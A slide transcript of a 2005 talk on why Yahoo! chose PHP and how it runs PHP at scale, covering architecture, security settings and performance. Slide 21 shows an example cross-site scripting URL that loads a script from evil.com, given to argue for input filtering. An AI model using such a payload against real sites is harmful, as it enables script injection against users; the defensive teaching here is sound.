1 / 26

PHP at Yahoo! public.yahoo/~radwin/

PHP at Yahoo! http://public.yahoo.com/~radwin/. Michael J. Radwin October 20, 2005. Outline. Yahoo!, as seen by an engineer Choosing PHP in 2002 PHP architecture at Yahoo!. The Internet’s most trafficked site. 25 countries, 13 languages. Yahoo! by the Numbers.

Download Presentation

PHP at Yahoo! public.yahoo/~radwin/

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. PHP at Yahoo! http://public.yahoo.com/~radwin/ Michael J. Radwin October 20, 2005

  2. Outline • Yahoo!, as seen by an engineer • Choosing PHP in 2002 • PHP architecture at Yahoo!

  3. The Internet’s most trafficked site

  4. 25 countries, 13 languages

  5. Yahoo! by the Numbers • 411M unique visitors per month • 191M active registered users • 11.4M fee-paying customers • 3.4B average daily pageviews October 2005

  6. Engineering Values • Security & Privacy • We must protect our customers’ information • High Availability • If the site is offline, we’re missing the opportunity to serve our customers • Performance • We serve billions of pageviews a day • Flexibility & Innovation • Customize site for each market • Rapid development of new features

  7. From Proprietary to Open Source 94 95 96 97 98 99 00 01 02 03 04 05 Web Server Apache “Filo Server” DB Flat Files Web Lang yScript

  8. How and Why We Selected PHP Choosing a Language

  9. Choosing PHP: brief history • October 2001: 3 proprietary languages • Costly to continue to maintain each • Limited features (no subroutines!) • Committee began researching • Compare features, performance • Build vs. Buy vs. Open Source • PHP selected May 2002

  10. High performance Robust, sand-boxed Language features Loops, conditionals Complex data-types C/C++ extensions Runs on FreeBSD Interpreted or dynamically compiled i18n support Clean separation of presentation/content/app semantics Low training costs Doesn’t require CS degree to use Ideal Language Criteria

  11. mod_include Top 10 Language Choices yScript XSLT

  12. Performance: Requests mod_perl yScript

  13. Performance: Memory mod_perl yScript

  14. Why we picked PHP • Designed for web scripting • High performance • Large, Open Source community • Documentation, easy to hire developers • “Code-in-HTML” paradigm <html> <?phpecho"Hello World";?> </html> • Integration, libraries, extensibility • Tools: IDE, debugger, profiler

  15. PHP at Yahoo! Today

  16. Yahoo!’s Development Methodology • Server Architecture • File Layout • Dependency Management • Security • Performance • Globalization

  17. Apache Server Architecture Load Balancer Web Server web server web server Scripts User Profile Server Web Services Ad Server

  18. File Layout • HTML Templates • /usr/local/share/htdocs/*.php 95% HTML 5% PHP • Template Helpers • /usr/local/share/htdocs/*.inc 50% HTML 50% PHP • Business Logic • /usr/local/share/pear/*.inc 0% HTML 100% PHP • C/C++ Core Code • Data access, Networking, Crypto 0% HTML 0% PHP

  19. Dependency Management • Base PHP package depends only on XML parser ./configure --disable-all • Self-Contained Extensions • mysql, dba, curl, ldap, pcre, gd, iconv • To enable • Install /usr/local/lib/php/20020429/mysql.so • Add “extension = mysql.so” to php.ini • Avoids unnecessary dependencies • Smaller Apache memory footprint

  20. Security: INI Settings • open_basedir • Insurance against /etc/passwd exploits • allow_url_fopen = Off • Use libcurl extension instead • Avoid open proxy exploits • display_errors = Off • However, log_errors = On • safe_mode = Off • Intended for shared hosting environment

  21. Security: Input Filtering http://search.yahoo.com/search?p=<script+src=http://evil.com/x.js> • Cross Site Scripting (XSS) most common attack • Also “SQL Injection” • Normal approach • strip_tags() • mysqli_escape_string() • Examine every line code • Tedious and error-prone • Use input_filter hook • Sanitize all user-submitted data • GET/POST/Cookie

  22. Performance: Opcode Caches • Easiest performance boost • Cache parsed .php scripts in shared memory • Optimizations • No code modifications! • Several products available • Zend Performance Suite • APC • Turck MMCache

  23. Performance: PHP Extensions in C++ • PHP ships with 80 extensions written in C/C++ • Yahoo! develops its own proprietary extensions • Fast execution speed • Access to client libraries • Longer development cycle • Edit, compile, link, debug • Manual memory-management

  24. ICU Globalization: PHP Unicode 6 • Native Unicode support in 2006 • Collaborative effort • Andrei Zmievski (Yahoo!) • Andi Gutmans (Zend) • Many members of PHP Community + + =

More Related